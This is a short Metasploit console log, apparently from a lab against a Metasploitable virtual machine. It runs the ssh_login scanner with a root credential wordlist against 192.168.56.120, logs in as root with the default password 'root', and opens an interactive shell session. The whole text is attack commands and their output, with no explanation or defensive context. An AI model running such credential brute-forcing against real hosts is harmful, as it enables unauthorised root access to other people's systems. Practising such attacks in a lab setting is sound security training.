use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.56.120
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
set VERBOSE false
msf auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.56.120:22 - Success: 'root:root' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.56.119:39841 -> 192.168.56.120:22) at 2018-09-20 06:48:48 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/ssh/ssh_login) > sessions -i 1